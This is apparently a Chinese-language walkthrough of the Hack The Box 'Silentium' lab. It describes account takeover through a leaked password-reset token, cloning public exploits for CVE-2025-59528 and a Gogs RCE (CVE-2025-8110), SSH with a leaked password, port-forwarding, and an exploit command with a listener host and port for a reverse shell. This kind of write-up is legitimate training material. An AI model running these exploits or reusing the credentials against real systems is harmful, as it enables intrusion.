渗透测试HTB Season10 Silentium全过程wp如何详细记录?
摘要:Silentium 信息收集 扫一下子域名 扫到staging.silentium.htb 我们抓个包试试 {"email":"ben@silentium.htb
Silentium
信息收集
扫一下子域名 扫到staging.silentium.htb
我们抓个包试试
{"email":"ben@silentium.htb","password":"1"}
从报错信息看出,也就是说用户的邮箱是ben@silentium.htb
去抓一个忘记密码的包
可以得到teamToken
这里密码随便设置Password123!
然后进行登录即可
漏洞利用(CVE-2025-59528)
git clone https://github.com/AzureADTrent/CVE-2025-58434-59528.git
可以看到自己是在docker容器里
我们看一下env有没有什么泄露的
有个密码是r04D!!_R4ge我们ssh一下
ssh ben@10.129.197.47
r04D!!_R4ge
提权
看一下监听的端口
有服务开启了3001端口
代理出来
ssh -L 3001:127.0.0.1:3001 ben@10.129.197.47
我们注册一个看看
漏洞利用(CVE-2025-8110)
CVE-2025-8110 Gogs远程命令注入漏洞绕过分析与复现-先知社区
git clone https://github.com/Ghxstsec/CVE-2025-8110.git
其中脚本要改一下username 和 token
python3 CVE-2025-8110-RCE.py -u http://127.0.0.1:3001 -lh 10.10.16.17 -lp 6666 -p 'chenzi123'
